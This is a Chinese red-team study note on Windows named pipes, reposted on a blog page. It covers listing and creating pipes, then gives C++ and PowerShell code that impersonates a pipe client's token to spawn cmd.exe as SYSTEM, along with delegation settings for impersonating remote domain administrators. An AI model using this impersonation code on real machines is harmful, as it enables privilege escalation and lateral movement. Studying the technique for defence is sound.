windows printf 行缓冲_Windows 命名管道研究初探

最新推荐文章于 2023-05-18 16:44:03 发布
最新推荐文章于 2023-05-18 16:44:03 发布
阅读量139 收藏
点赞数
文章标签: windows printf 行缓冲 一个命名管道可以被多个客户端访问吗 不同电脑 命名管道 命名空间system中不存在data 多个客户端抢夺命名管道 指定命名区域不存在

3d962dcbae59ef2647acf7effbd19f12.png

Industrial frame with yellow pipelines and other objects against the white brick wall background. Vector illustration 隶属于 360 公司信息安全中心,我们深谙“未知攻,焉知防”,团队成员专注于各类漏洞利用研究,在红蓝对抗、区块链安全、代码审计拥有多年资深经验。 author: xianyu@360RedTeam

本文是自己在windows安全方向从零开始学习windows命名管道的过程中记录的一个简单的学习过程,主要着重于基础,从如何查看,访问,创建命名管道,再从命名管道的本身一些特性触发,还原一些命名管道在实际应用中的效果,并且去排除一些学习过程中踩到的坑和雷,为后面的研究铺一下道路。  

命名管道定义及其特点

命名管道是一个具有名称,可以单向或双面在一个服务器和一个或多个客户端之间进行通讯的管道。 命名管道的所有实例拥有相同的名称,但是每个实例都有其自己的缓冲区和句柄,用来为不同客户端通许提供独立的管道。 使用实例可使多个管道客户端同时使用相同的命名管道。
  1. 命名管道的名称在本系统中是唯一的。
  2. 命名管道可以被任意符合权限要求的进程访问。
  3. 命名管道只能在本地创建。
  4. 命名管道的客户端可以是本地进程(本地访问:\.\pipe\PipeName)或者是远程进程(访问远程:\ServerName\pipe\PipeName)。
  5. 命名管道使用比匿名管道灵活,服务端、客户端可以是任意进程,匿名管道一般情况下用于父子进程通讯。
 

命名管道基础

列出当前计算机上的所有命名管道:

通过powershell: V3以下版本powershell 
[System.IO.Directory]::GetFiles("\\.\\pipe\\")
V3以上 
Get-ChildItem \\.\pipe\

5898be030e599d9fe4265d14973e2791.png

通过Process Explorer的Find-Find Handle or DLL功能查找名为\Device\NamedPipe

0683d585a89825a87157fc5864e375ac.png

通过Sysinternals工具包种的pipelist.exe 通过chrome地址栏输入file://.//pipe//

f4fbc723ef8e02d8adc33fed12b99623.png

通过C# 
 String[] listOfPipes = System.IO.Directory.GetFiles(@"\\.\pipe\");

创建命名管道

代码参考 https://github.com/xpn/getsystem-offline https://github.com/decoder-it/pipeserverimpersonate 创建命名管道都存在多个重载,在创建命名管道的时候可以通过不同参数具体指定所需要的权限与功能。 Powershell 
$PipeSecurity = New-Object System.IO.Pipes.PipeSecurity$AccessRule = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )$PipeSecurity.AddAccessRule($AccessRule) //设置权限$pipe = New-Object System.IO.Pipes.NamedPipeServerStream($pipename,"InOut",10, "Byte", "None", 1024, 1024, $PipeSecurity)//创建命名管道$pipe.WaitForConnection()$pipeReader = new-object System.IO.StreamReader($pipe)$Null = $pipereader.ReadToEnd() //读取数据
C++ 
  SECURITY_ATTRIBUTES sa ={0};    SECURITY_DESCRIPTOR sd={0};    InitializeSecurityDescriptor( &sd,SECURITY_DESCRIPTOR_REVISION);    SetSecurityDescriptorDacl(&sd,TRUE,NULL,FALSE);    sa.bInheritHandle =false;    sa.lpSecurityDescriptor =&sd;    sa.nLength =sizeof(sa);     //设置安全描述符为任意用户均可访问    hPipe = CreateNamedPipe(TEXT("\\\\.\\pipe\\Pipe"),                            PIPE_ACCESS_DUPLEX,                            PIPE_TYPE_BYTE | PIPE_READMODE_BYTE | PIPE_WAIT,   // FILE_FLAG_FIRST_PIPE_INSTANCE is not needed but forces CreateNamedPipe(..) to fail if the pipe already exists...                            1,                            1024 * 16,                            1024 * 16,                            NMPWAIT_USE_DEFAULT_WAIT,                            &sa);    while (hPipe != INVALID_HANDLE_VALUE)    {        if (ConnectNamedPipe(hPipe, NULL) != FALSE)         {            ....        }        DisconnectNamedPipe(hPipe);    }
C# 
var server = new NamedPipeServerStream("PipesOfPiece");server.WaitForConnection();while (true){       ...}

访问命名管道

可以通过命令行利用重定向符号直接把内容写入到命名管道中 echo “test” > \\.\pipe\test 通过C#类NamedPipeClientStream实现访问命名管道 
NamedPipeClientStream pipeClient =new NamedPipeClientStream(".", "testpipe", PipeDirection.In))//System.Security.Principal.TokenImpersonationLevel.Delegation添加此参数可以允许服务端模拟客户端powershell同样调用NamedPipeClientStream实现访问命名管道 C++访问命名管道   HANDLE hPipe = CreateFile(TEXT("\\\\.\\pipe\\test"),                        GENERIC_READ | GENERIC_WRITE,                        0,                       NULL,                       OPEN_EXISTING,                       0,                       NULL);    if (hPipe != INVALID_HANDLE_VALUE)    {        ....        CloseHandle(hPipe);    }

设置服务端模拟客户端

windows对于模拟功能是有严格管理的,以下摘自《深入理解windows操作系统》 为了防止滥用模仿机制,Windows不允许服务器在没有得到客户同意的情况下执行模仿。 客户进程在连接到服务器的时候可以指定一个SQOS(security quality of service),以此限制服务器进程可以执行的模拟等级。 通过C++代码访问命名管道一般采用CreateFile函数,可以通过指定SECURITYANONYMOUS、SECURITYIDENTIFICATION、SECURITYIMPERSONATION、SECURITYDELEGATION作为标记。 默认调用CreateFile函数访问命名管道时采用的权限就是IMPERSONATION级别,只能用于模拟本地权限,无法应用域远程访问。 其中权限最高的级别为DELEGATION,当客户端模拟级别设置为此级别时,服务端可以任意模拟客户端权限,包括本地和远程。 但是DELEGATION权限的使用对客户端和服务端都是有要求的。 测试正常的模拟 默认情况下只有服务用户具有模拟客户端的功能,所以测试前需要为测试用户启用以下权限

3206b2596e94fb42b4cb9c238cf066d6.png

dfb788461a4917d0d22482445d04609e.png

100707e77715f63a71da29270d1020fa.png

默认情况下 echo 123 > \\192.168.1.x\pipe\test233 就允许服务端模拟客户端 C++ demo 
if (ImpersonateNamedPipeClient(hPipe) == 0) {    printf("[!] Error impersonating client %d\n", GetLastError());    return 0;}if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &token)) {    printf("[!] Error opening thread token %d\n", GetLastError());    return 0;}if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &newtoken)) {    printf("[!] Error duplicating thread token %d\n", GetLastError());    return 0;}printf("[*] Impersonated SYSTEM user successfully\n");if (!CreateProcessWithTokenW(newtoken, LOGON_NETCREDENTIALS_ONLY, L"", L"C:\\windows\\system32\\cmd.exe", NULL, NULL, NULL, (LPSTARTUPINFOW)&si, &pi)) {    printf("[!] CreateProcessWithToken failed (%d).\n", GetLastError());    return 0;}
powershell 
$pipe.WaitForConnection()$PipeHandle = $pipe.SafePipeHandle.DangerousGetHandle()$Out = $ImpersonateNamedPipeClient.Invoke([Int]$PipeHandle)$user=[System.Security.Principal.WindowsIdentity]::GetCurrent().Name$ThreadHandle = $GetCurrentThread.Invoke() //获取当前进程句柄[IntPtr]$ThreadToken = [IntPtr]::Zero[Bool]$Result = $OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_ALL_ACCESS, $true, [Ref]$ThreadToken) //从当前进程中取出token$RetVal = $RevertToSelf.Invoke()$pipe.close()$StartupInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$STARTUPINFO)[IntPtr]$StartupInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($StartupInfoSize)$memset.Invoke($StartupInfoPtr, 0, $StartupInfoSize) | Out-Null[System.Runtime.InteropServices.Marshal]::WriteInt32($StartupInfoPtr, $StartupInfoSize) $ProcessInfoSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$PROCESS_INFORMATION)[IntPtr]$ProcessInfoPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($ProcessInfoSize)$memset.Invoke($ProcessInfoPtr, 0, $ProcessInfoSize) | Out-Null$processname="c:\windows\system32\cmd.exe"$ProcessNamePtr = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($processname)$ProcessArgsPtr = [IntPtr]::Zero$Success = $CreateProcessWithTokenW.Invoke($ThreadToken, 0x0,$ProcessNamePtr, $ProcessArgsPtr, 0, [IntPtr]::Zero, [IntPtr]::Zero, $StartupInfoPtr, $ProcessInfoPtr) //用从进程中获取的token创建新的进程
模拟本地用户从administrator到system

f6ab4faaae0eaea7f31b9e0bcdb0b2cf.png

6d9006ee81ef649820ba2aa4a0161897.png

09ee86d75eeb9671575db37c50935a61.png

模拟远程用户(域管)     如果我们使用默认IMPERSONATION权限进行远程认证会出现问题

a680e9201a74572a573d9c9b1662568a.png

4427ab6313f974baf33c7552283def56.png

dc46dd4fbb9657d18824fbc4bd258f8b.png

4ada13e77a88bb595f092a7d164c0427.png

默认客户端权限模拟产生的用户进程无法用于任何远程认证
模拟客户端产生进程,是通过提取当前进程token产生的,而token中只存在sid和acl等信息,其中不包含认证所需要的密码、hash,所以只能用于本地权限认证。 如果用于远程认证就会出现权限鉴定出错的情况 失败的

6bf0e43b5d846ad5d8020db99c2e54d3.png

7c35b21710cb2f79518334075d2b812f.png

正常的hash传递认证过程

82df55ef84f745cd984bcf2f631211db.png

4ad1ce9e9f31654fa792f7e52a151838.png

SECURITY_DELEGATION权限问题

https://docs.microsoft.com/en-us/windows/win32/com/impersonation-levels 如果客户端采用SECURITYDELEGATION权限连接服务端,则允许服务端任意模拟客户端权限,包括本地和远程认证,但是根据官网文档,服务端要接受SECURITYDELEGATION权限的委派,服务端需要满足以下条件

b69d173217079e9bcec638eae8336452.png

其实总结下来就是两条: 客户端账户不能被设置为无法委派

3f13b0e5de390fd02b3ec5a5e63d5663.png

作为服务端的用户必须设置无约束委派 这个地方存在一个表述不清楚的地方,英文是写的server account,但在实际测试中,如果要实现命名管道用户委派级别的模拟,需要将启用命名管道的计算机名用户设置为无约束委派,用来启动命名管道的用户并不需要无约束委派权限。

3873df65ef416a2ee55c73b1e8437da3.png

另外在设置命名管道委派权限的模拟的时候还有一点需要注意,根据文档中所说NTLM是不支持跨计算机的委派的,只有kerberos才能实现跨计算机的委派,所以在客户端访问服务端的时候需要采用计算机名访问而不是IP

f5103690b028d9656629cf0f21c155c5.png

b4eba0e972bcc2b13eb6e478a3b4453c.png

所以我们可以自行编写支持DELEGATION权限的客户端来实现完整权限的委派模拟 
System.IO.Pipes.NamedPipeClientStream client = new System.IO.Pipes.NamedPipeClientStream("WIN-46OU1O8BCNG", pipe,  System.IO.Pipes.PipeDirection.Out,  System.IO.Pipes.PipeOptions.None,  System.Security.Principal.TokenImpersonationLevel.Delegation );
通过此客户端就可以实现委派级别的模拟 其他坑点 在利用token创建新进程使用的CreateProcessWithTokenW函数是存在一些问题的,如果创建的任务有gui的要求,窗口显示会出现问题,若是运行的程序不考虑窗口问题,就可以忽略此坑。 如果模拟的用户对当前桌面的权限存在异常的话需要特别指定lpStartupInfo参数,为模拟的用户重新设置当前桌面环境的ACE 修改部分的代码可以参考https://docs.microsoft.com/zh-tw/previous-versions/aa379608(v=vs.85)  

命名管道的利用

利用命名管道的模拟客户端功能来获取system权限,msf的getsystem功能就是通过此方法实现 作为C2信道,通讯执行命令 作为本地权限提升漏洞的利用链中的一步  

参考资料

https://decoder.cloud/2019/03/06/windows-named-pipes-impersonation/ http://www.blakewatts.com/namedpipepaper.html

c377ee45464cd28459bd6ba5a6416677.gif

weixin_39648297
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
模拟实现进程的创建与撤销_PrintSpoofer:滥用Windows 10和Server 2019上的模拟特权
weixin_39895283的博客
11-30 362
概述在过去的几年,类似于RottenPotato、RottenPotatoNG或Juicy Potato这样的一些Windows特权模拟工具,已经在攻防安全社区非常流。但是,随着操作系统不断的升级,其也有意或无意地降低了在Windows 10和Windows Service 2016/2019上使用这些工具的效果。而我们本次分析的是一个全新的工具,将有助于渗透测试人员再次轻松地...
管道系统
小憩一下
05-01 2043
关于管道 在Linux管道是一种使用非常频繁的通信机制。从本质上说,管道也是一种文件,但它又和一般的文件有所不同管道可以克服使用文件进通信的两个问题,具体表现为:   · 限制管道的大小。实际上,管道一个固定大小的缓冲区。在Linux,该缓冲区的大小为1页,即4K字节,使得它的大小不象文件那样不加检验地增长。使用单个固定缓冲区也会带来问题,比如在写管道时可能变满,当这种情况
IPC之 - C#用NamedPipe进程间通信
~飞 鸟 (*^__^*) 天 堂~
02-25 2174
 C#用NamedPipe进程间通信的测试例子,核心代码是kernel32.dll的一组windows api函数,这里不深入研究,代码都在codeproject上。  Inter-Process Communication in .NET Using Named Pipes, Part 1  测试效果如下,可以做到aspx和给console app发送消息后得到反馈:
由psexec远控的实现原理到windows命名管道
热门推荐
Shanfenglan's blog
09-07 19万+
CATALOGpsexec部分已有资产从被连接主机(lisi)的事件来看psexec到底做了什么从攻击机的流量上来看psexec命令背后做了什么命名管道我理解的命名管道利用具体代码实现服务端代码客户端代码 psexec部分 psexec一般会被用来做横移,只要我们拥有对方主机的账号密码就可以做到远程控制对方主机,我们首先看看但我们执psexec这个程序的时候,到底发生了什么。 已有资产 用户 ip 主机名 zhangsan 192.168.23.23 red lisi 192.168.
NamedPipe,利用IOCP实现命名管道异步通信
alpbrook的专栏
01-29 4351
微软提供了利用回调函数来实现有名管道的示例:Named Pipe Server Using Completion Routines. 该示例使用了ReadFileEx和WriteFileEx函数来进有名管道的异步读写操作。我们在该示例的基础上进改写来实现通过IOCP来进异步读写。主要改动在哪下几个方面: 1.删去 CreateEvent操作,改为CreateIoCompletion
self_printf.rar_printf_printf函数_self
09-23
本项目名为"self_printf.rar_printf_printf函数_self",其核心是实现一个自定义的`printf`函数,帮助初学者理解变长参数列表的原理和用法。下面我们将详细探讨`printf`函数的原理、如何实现自定义的`printf`函数,...
API.rar_windows api
09-23
Windows API,全称为Application Programming Interface,是微软提供的一系列接口函数,用于开发在Windows操作系统上运的应用程序。这些API函数提供了操作系统级别的服务,包括图形用户界面(GUI)创建、文件管理...
windows多线程con.rar_Windows多线程_windows 多线程
09-19
Windows Console环境下,程序通常会通过控制台I/O(如`printf`和`scanf`)与用户交互。在多线程程序,要注意控制台I/O操作不是线程安全的,因此需要适当的同步机制,比如使用`critical_section`或`mutex`,以...
test_adc_lcd.zip_Windows_Unix_
08-12
在开发这样的系统时,开发者可能还会使用像MPLAB X IDE这样的工具来编写、编译和调试代码,同时可能使用如printf调试技巧在串口终端查看间结果。对于Unix系统,可能还需要交叉编译工具链,如GCC针对特定微控制器的...
cbiaozhukudaima.rar_Windows编程_Visual_C++_
08-11
Windows编程与Visual C++:深入理解C标准库源代码》 Windows编程是软件开发一个重要领域,尤其在企业级应用和系统级编程占据着核心地位。Visual C++作为微软公司推出的强大开发工具,是Windows平台下进...
Windows命名管道&getsystem原理学习记录
include_voidmain的博客
12-08 397
可以利用Impersonate-NamedPipeClient这个API,通过命名管道的服务端进程模拟客户端进程的访问令牌
c# winform 实现客户端和服务器端互相交互
weixin_30301183的博客
07-20 1325
服务器端的代码 using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Windows.For...
Winform与Windows服务之间的数据交互
naruto2017的博客
05-18 1098
Windows服务和WinForm应用程序之间交换数据,有多种可能的解决方案,包括使用文件、数据库、共享内存,或者使用Windows的进程间通信(IPC)技术。一种常见的IPC技术是使用命名管道(Named Pipe),另一种是使用Windows Communication Foundation (WCF)。你可以创建一个共享的文件或数据库,这两个应用程序都可以读写。然而,这种方法可能导致同步和锁定问题,因此需要仔细处理。使用内存映射文件或共享内存是一种更快的解决方案,但也更难实现。
Windows管道通信实现进程通信
demon_xiao的专栏
04-22 2万+
Windows下用管道通信(pipe)实现进程间数据共享管道是一种用于在进程间共享数据的机制,其实质是一段共享内存。Windows系统为这段共享的内存设计采用数据流I/0的方式来访问。由一个进程读、另一个进程写,类似于一个管道两端,因此这种进程间的通信方式称作“管道”。 管道分为匿名管道命名管道。 匿名管道只能在父子进程间进通信,不能在网络间通信,而且数据传输是单向的,只能一端写,另一端读。
C#使用命名管道Pipe实现进程通信实例
樱花的博客
09-29 1万+
1.新建解决方案NamedPipeExample 新建两个项目:Client和Server,两者的输出类型均为“Windows 应用程序”。整个程序的结构如下图所示。 此Form1为Client的窗体,如下图所示。 后端代码,如下。 using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq
windows进程间内核对象的共享方式(c++实现)
荆轲刺秦王的博客
03-22 509
一.内核对象句柄的继承以这种方式共享,父子进程使用的句柄(对于某个内核对象)的值当然是相等的。process_A:int main(int argc, char* argv[]) { /* * A进程创建一个信号量, 并将其句柄声明是可继承的。 */ SECURITY_ATTRIBUTES security_attr; security_attr.nLength = sizeof(...
C++进程通信之命名管道
hk627989388的博客
12-19 5414
命名管道通过网络来完成进程间通信,它屏蔽了底层的网络协议细节。
Windows命名管道实现一对多进程通信 [C++实现]
qq_43596950的博客
04-15 943
一个服务端,两个进程先后向管道写入数据。这里的一对多实质上是有先后顺序的一对一
windows 查看进程_浅谈 windows 命名管道
weixin_39566493的博客
11-20 2194
很多时候,在一些文章,工具利用,都会提到管道(pipe)。那么,什么是管道呢?管道能做什么呢?本文以 windows 管道为主,边学习边整理,希望可以给其他感兴趣的人提供帮助。如有不到之处,或是描述错误的地方请大家多多包涵,多多指点。一、管道简述管道并不是什么新鲜事物,它是一项古老的技术,可以在很多操作系统(Unix、Linux、Windows 等)找到,其本质是是用于进程间通信的...
printf(__VA_ARGS__)
最新发布
08-24
`printf(__VA_ARGS__)`是一个C语言的宏定义,用于在编译时将可变参数传递给`printf`函数。`__VA_ARGS__`是一个特殊的预处理宏,它表示一个可变数量的参数,可以在宏定义使用。当你在代码调用`printf(__VA_ARGS...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值